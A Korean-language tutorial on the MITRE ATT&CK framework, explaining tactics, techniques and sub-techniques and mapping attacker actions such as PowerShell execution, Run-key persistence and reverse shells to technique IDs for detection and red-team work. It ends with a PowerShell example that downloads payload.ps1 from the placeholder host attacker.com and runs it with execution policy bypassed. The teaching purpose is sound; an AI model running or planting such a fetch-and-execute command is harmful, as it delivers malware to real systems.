MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge)는 실제 공격자가 사용하 는 공격 기술(TTPs)을 정리해 놓은 공격 지식베이스이다.
사이버 공격을 전술(Tactic), 기술(Technique), 하위 기술(Sub-technique)로 분해해서 설명함
공격자의 행동을 정확히 분석하고, 탐지/방어 전략을 세우는 데 활용됨
레드팀 시나리오 작성, 탐지 룰 매핑, BAS 실습 구성 등에 필수적으로 사용됨
| 구성 요소 | 설명 | 예시 |
|---|---|---|
| Tactic (전술) | 공격자의 목적 (왜?) | Initial Access, Execution, C2 등 |
| Technique (기술) | 목표를 달성하는 방법 (어떻게?) | T1059 - Command & Scripting Interpreter |
| Sub-technique (하위 기술) | 더 구체적인 실행 방식 | T1059.001 - PowerShell |
공격자가 PowerShell을 사용해 악성 스크립트를 실행한다면?
이 코드는 모두 MITRE 기술 ID로 표현될 수 있고, 공격 로그 분석, 탐지 룰 작성, BAS 시나리오 생성 시 매우 중요함
| 행위 | 해당 MITRE 기술 |
|---|---|
| PowerShell 스크립트 실행 | T1059.001 – PowerShell |
| 사용자 클릭 유도 (.lnk 등) | T1204.002 – User Execution: Malicious File |
| 레지스트리 등록 (Run 키) | T1547.001 – Registry Run Key |
| Reverse Shell 연결 | T1071.001 – Web Protocols |
| whoami, ipconfig 등 시스템 정찰 | T1033 – System Owner/User Discovery |
Execution 전술 : PowerShell을 통한 명령 실행
# [T1059.001 - PowerShell] PowerShell 스크립트 원격 다운로드 및 실행
Invoke-WebRequest -Uri "<http://attacker.com/payload.ps1>" -OutFile "$env:TEMP\\payload.ps1"
Start-Process powershell -ArgumentList "-ExecutionPolicy Bypass -File $env:TEMP\\payload.ps1"